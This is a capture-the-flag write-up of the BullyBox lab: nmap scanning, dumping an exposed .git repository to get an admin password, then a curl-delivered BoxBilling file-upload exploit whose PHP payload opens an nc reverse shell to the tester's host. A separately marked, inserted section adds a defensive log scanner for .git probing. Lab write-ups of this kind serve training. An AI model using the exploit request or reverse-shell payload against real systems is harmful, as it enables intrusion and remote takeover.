
OSCP - Proving Grounds - BullyBox

Key takeaways

  • If a domain name is discovered, add it to /etc/hosts and rerun scans such as nmap and nikto
  • When running dirsearch, use a more complete wordlist so that nothing is missed
  • .git dump

Detailed steps

Running an nmap scan shows ports 80 and 22 open; visiting the site redirects to bullybox.local.

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-14 12:20 UTC
Nmap scan report for 192.168.59.27
Host is up (0.00072s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
|_  256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.52 (Ubuntu)

Edit /etc/hosts to map the IP to bullybox.local and rerun the nmap scan. This returns much more information, such as the .git path and the entries in robots.txt.

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-15 17:50 EDT
Nmap scan report for bullybox.local (192.168.174.27)
Host is up (0.44s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
|_  256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
| http-robots.txt: 8 disallowed entries 
| /boxbilling/bb-data/ /bb-data/ /bb-library/ 
|_/bb-locale/ /bb-modules/ /bb-uploads/ /bb-vendor/ /install/
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Client Area 
| http-git: 
|   192.168.174.27:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Ready For launch 
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Visiting the paths listed in robots.txt turns up a likely admin username.

Searching for a tool that can dump a .git directory turns up GitHub - arthaud/git-dumper: A tool to dump a git repository from a website. Running it dumps the repository successfully; if a proxy is configured, remember to run unset http_proxy first, otherwise it fails with 502 errors.

C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox\git-dumper-master> python git_dumper.py http://bullybox.local/.git ~/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/dump
/home/kali/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/git_dumper.py:409: SyntaxWarning: invalid escape sequence '\g'
  modified_content = re.sub(UNSAFE, '# \g<0>', content, flags=re.IGNORECASE)
[-] Testing http://bullybox.local/.git/HEAD [502]
[-] http://bullybox.local//.git/HEAD responded with status code 502

C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox\git-dumper-master> unset http_proxy

C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox\git-dumper-master> python git_dumper.py http://bullybox.local/.git ~/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/dump
/home/kali/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/git_dumper.py:409: SyntaxWarning: invalid escape sequence '\g'
  modified_content = re.sub(UNSAFE, '# \g<0>', content, flags=re.IGNORECASE)
[-] Testing http://bullybox.local/.git/HEAD [200]
[-] Testing http://bullybox.local/.git/ [403]
[-] Fetching common files
[-] Fetching http://bullybox.local/.git/hooks/post-update.sample [200]
[-] Fetching http://bullybox.local/.git/hooks/pre-commit.sample [200]
[-] Fetching http://bullybox.local/.git/hooks/post-commit.sample [404]
[-] http://bullybox.local/.git/hooks/post-commit.sample responded with status code 404
[-] Fetching http://bullybox.local/.git/hooks/pre-applypatch.sample [200]
[-] Fetching http://bullybox.local/.git/description [200]
[-] Fetching http://bullybox.local/.gitignore [404]
[-] http://bullybox.local/.gitignore responded with status code 404
[-] Fetching http://bullybox.local/.git/hooks/post-receive.sample [404]
[-] http://bullybox.local/.git/hooks/post-receive.sample responded with status code 404
[-] Fetching http://bullybox.local/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://bullybox.local/.git/COMMIT_EDITMSG [200]
[-] Fetching http://bullybox.local/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://bullybox.local/.git/hooks/commit-msg.sample [200]
[-] Fetching http://bullybox.local/.git/hooks/pre-push.sample [200]
[-] Fetching http://bullybox.local/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching http://bullybox.local/.git/index [200]
[-] Fetching http://bullybox.local/.git/objects/info/packs [404]
[-] http://bullybox.local/.git/objects/info/packs responded with status code 404
[-] Fetching http://bullybox.local/.git/hooks/pre-receive.sample [200]
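An added detection example (not part of the original write-up): the paths git-dumper fetched above form a clear signature in the web server's access log, so this Python script scans Apache combined-format log lines for requests under /.git/ and flags clients that were actually served repository metadata (a 2xx status), which is the condition that lets a tool like git-dumper rebuild the source and recover files such as bb-config.php. The log lines and IP addresses are constructed for the example, not taken from the box.

```python
import re
from collections import defaultdict

# Apache "combined" log format; only the fields the check needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# Anything under a .git directory (possibly nested, e.g. /app/.git/HEAD)
# plus a top-level .gitignore; /.github/ and similar names do not match.
GIT_PATH_RE = re.compile(r'(^|/)\.git(/|$)|(^|/)\.gitignore$')

def is_git_path(path: str) -> bool:
    """True when the request targets Git metadata (query string ignored)."""
    return GIT_PATH_RE.search(path.split('?', 1)[0]) is not None

def scan_access_log(text: str) -> dict:
    """Group .git requests per client IP.

    Returns {ip: {"requests": count, "leaked": [paths served with 2xx]}}.
    """
    findings = defaultdict(lambda: {"requests": 0, "leaked": []})
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or not is_git_path(m["path"]):
            continue
        rec = findings[m["ip"]]
        rec["requests"] += 1
        if m["status"].startswith("2"):      # metadata actually served
            rec["leaked"].append(m["path"])
    return dict(findings)

def severity(rec: dict) -> str:
    """'exposed' if any metadata was served, otherwise only a 'probe'."""
    return "exposed" if rec["leaked"] else "probe"

# Constructed sample log, modelled on the git-dumper request sequence above.
SAMPLE_LOG = """\
192.0.2.10 - - [15/Oct/2024:17:55:01 -0400] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "python-requests/2.32.3"
192.0.2.10 - - [15/Oct/2024:17:55:01 -0400] "GET /.git/ HTTP/1.1" 403 278 "-" "python-requests/2.32.3"
192.0.2.10 - - [15/Oct/2024:17:55:02 -0400] "GET /.git/description HTTP/1.1" 200 73 "-" "python-requests/2.32.3"
192.0.2.10 - - [15/Oct/2024:17:55:02 -0400] "GET /.git/index HTTP/1.1" 200 4512 "-" "python-requests/2.32.3"
192.0.2.10 - - [15/Oct/2024:17:55:03 -0400] "GET /.git/objects/info/packs HTTP/1.1" 404 275 "-" "python-requests/2.32.3"
192.0.2.10 - - [15/Oct/2024:17:55:03 -0400] "GET /.git/hooks/pre-commit.sample HTTP/1.1" 200 1643 "-" "python-requests/2.32.3"
203.0.113.5 - - [15/Oct/2024:17:56:10 -0400] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [15/Oct/2024:17:56:12 -0400] "GET /robots.txt HTTP/1.1" 200 210 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, rec in scan_access_log(SAMPLE_LOG).items():
        print(f"{ip}: {rec['requests']} .git requests, {severity(rec)}, served: {rec['leaked']}")
```

A 200 on /.git/HEAD is the quickest confirmation that the repository is exposed; denying access to dot-directories in the virtual host (for example `<DirectoryMatch "/\.git">` with `Require all denied` in Apache) removes the leak.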

Running cat /bb-config.php in the dump reveals a likely password; combined with the username admin@bullybox.local found earlier, the login succeeds.

 array (
    'type' => 'mysql',
    'host' => 'localhost',
    'name' => 'boxbilling',
    'user' => 'admin',
    'password' => 'Playing-Unstylish7-Provided',
  ),

The version turns out to be 4.22.1.5, and a search finds a file upload vulnerability, BoxBilling <= 4.22.1.5 - Remote Code Execution (RCE) - PHP webapps Exploit, so let's try it.

First obtain the PHPSESSID stored in the cookie via Firefox, start nc -nlvp locally, then issue the following request. I sent it with Postman, which generates the curl command below.

curl --location 'http://bullybox.local/index.php?_url=%2Fapi%2Fadmin%2FFilemanager%2Fsave_file' \
--header 'Cookie: PHPSESSID=tjlfj0mpf85cjgh8g0rjtc0jnn' \
--header 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'order_id=1' \
--data-urlencode 'path=reverse.php' \
--data-urlencode 'data=<?php shell_exec('\''rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 192.168.45.209 80>/tmp/f'\''); ?>'

This yields a reverse shell; the user has sudo rights, so the flag can be read directly.

C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox> nc -nlvp 80  
listening on [any] 80 ...
connect to [192.168.45.209] from (UNKNOWN) [192.168.226.27] 57090
bash: cannot set terminal process group (1311): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

yuki@bullybox:/var/www/bullybox$ id
id
uid=1001(yuki) gid=1001(yuki) groups=1001(yuki),27(sudo)
yuki@bullybox:/var/www/bullybox$ sudo -l
sudo -l
Matching Defaults entries for yuki on bullybox:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User yuki may run the following commands on bullybox:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL
yuki@bullybox:/var/www/bullybox$ sudo cat /root/proof.txt
sudo cat /root/proof.txt
2cf1d3dd8eab874dd006dad9912c1388
yuki@bullybox:/var/www/bullybox$ 


http://www.kler.cn/a/512073.html
